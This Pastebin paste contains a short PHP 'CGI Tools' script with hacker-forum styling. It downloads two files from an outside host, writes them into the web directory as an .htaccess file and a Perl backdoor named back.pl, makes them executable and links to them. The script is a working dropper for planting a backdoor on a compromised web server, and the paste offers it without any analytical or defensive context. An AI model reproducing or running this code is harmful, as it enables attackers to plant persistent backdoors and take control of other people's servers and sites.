Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>xConsoLe's CGI Tools</title>
- <style>
- background:black url('http://cdn.hackforums.net/images/blackreign/bg.png');
- a:link {text-decoration:none;}
- a:hover {
- border-bottom: 1px dashed #ba0000;
- }
- a:visited {text-decoration:none;}
- </style>
- <body text="#FF0000" bgcolor="#000000" link="#CCCCCC" vlink="#808080" alink="#999999">
- <font face="Tahoma" size="1" color="#f30000"><br><b>
- <?
- @set_time_limit(0);
- @error_reporting(E_ALL | E_NOTICE);
- $x=array(
- "ht.txt"=>".htaccess",
- "back.txt"=>"back.pl",
- );
- foreach($x as $d=>$z){
- $file = fopen($z ,"w+");
- $sa=file_get_contents('http://expertisepc.com/df/me/'.$d);
- $write = fwrite ($file ,$sa);
- fclose($file);
- if($write){ echo "[+] Writed : <a href='./$z'>$z</a> </br>"; }else{ echo "[~] Can't Write : $z <br>"; }
- chmod($z , 0755);
- }
- ?>
- </b>
- </font><b>
- <font face="Tahoma" size="2" color="#CCCCCC">
- </font><font face="Tahoma" size="2" color="#999999">
- <!-- /xC?-->
- DoNE !</font>
- </br>
- </b>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement